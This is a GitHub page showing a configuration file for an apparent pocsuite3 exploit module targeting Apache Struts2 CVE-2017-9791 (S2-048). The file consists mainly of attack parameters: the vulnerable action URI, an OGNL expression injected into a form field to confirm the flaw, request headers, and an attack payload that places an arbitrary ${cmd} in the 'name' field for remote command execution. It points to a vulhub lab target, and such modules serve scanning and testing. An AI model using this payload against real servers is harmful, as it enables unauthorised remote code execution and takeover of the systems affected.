-
Notifications
You must be signed in to change notification settings - Fork 1
/
.env_cve_2017_9791
49 lines (43 loc) · 2.6 KB
/
.env_cve_2017_9791
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
CLASSNAME = 'Apache_Struts2_CVE_2017_9791'
VUL_ID = 'LDY-2020-00003327'
VUL_DATE = '2017-10-07'
CREATEDATE = '2022-12-22'
UPDATEDATE = '2022-12-22'
APP_NAME = 'Apache_Struts2'
VUL_NAME = '远程命令执行(RCE)' #漏洞名称
VUL_NUM = 'CVE_2017_9791' #漏洞编号
CVE_NUM = 'CVE_2017_9791' #CVE编号
CNVD_NUM = '' #CNVD编号
VUL_TYPE = 'CODE_EXECUTION' # 必填,漏洞类型,参考 pocsuite3 VUL_TYPE的取值范围
POC_CATEGORY = 'EXPLOITS.WEBAPP' # 必填,漏洞分类,参考 pocsuite3 POC_CATEGORY的取值范围
SEVERITY = 'Critical' # 必填,严重等级,取值范围 Critical , High , Medium, Low
REQAUTH = 'False' # 必填,boolen值,该漏洞验证或利用是否需要先认证
FINGERPRINT_NAMES = 'Apache_Struts2' # 必填,当命中哪些指纹后,可使用该poc。列表中是指纹的名称
APP_MAIN_PORT = '80' # 必填,该应用的默认配置端口,用于快速扫描模式,若无法确认可以写80
APPVERSION = '2.0.0 - 2.3.32' # 必填,漏洞影响的版本号
APPPOWERLINK = 'https://struts.apache.org' # 非必填,应用厂商链接
DESC = '攻击者构造恶意字段值(value)通过Struts2的struts2-struts1-plugin传递给被攻击主机,从而实现RCE,获取远程主机的控制权限。' # 必填,漏洞描述,需尽量详细,参考cnnvd的写法 [应用简介],[漏洞简介]
SUGGEST = '升级至最新版本' # 必填,修复建议
HASEXP = 'True' # 必填,boolen值,是否包含exp
TARGETS = 'https://github.com/vulhub/vulhub/tree/master/struts2/s2-048' # 必填,该Poc适用的目标,string类型 https://github.com/vulhub/vulhub/tree/master/weblogic/CVE-2017-10271
SURICATA_RULES = '' # 必填,suricata格式的检测规则,这里只需要填写匹配流量包关键词即可
COMMAND = ''
FILE_PATH = '#'
URI = '/integration/editGangster.action' #payload请求uri
PAYLOAD_DATA = '{
"name": ${99999*66666},
"age": 10,
"__checkbox_bustedBefore": "true",
"description": 1 ,}' #传入的data数据
METHOD = 'post' # request 请求方式 get、post
HEADERS = '{
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0",
"Connection": "close",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
}'
KEYWORD = '1923401258' #判断是否存在漏洞,匹配关键词
ATTACK_PAYLOAD_DATA = '{
"name": ${cmd},
"age": 10,
"__checkbox_bustedBefore": "true",
"description": 1 ,}'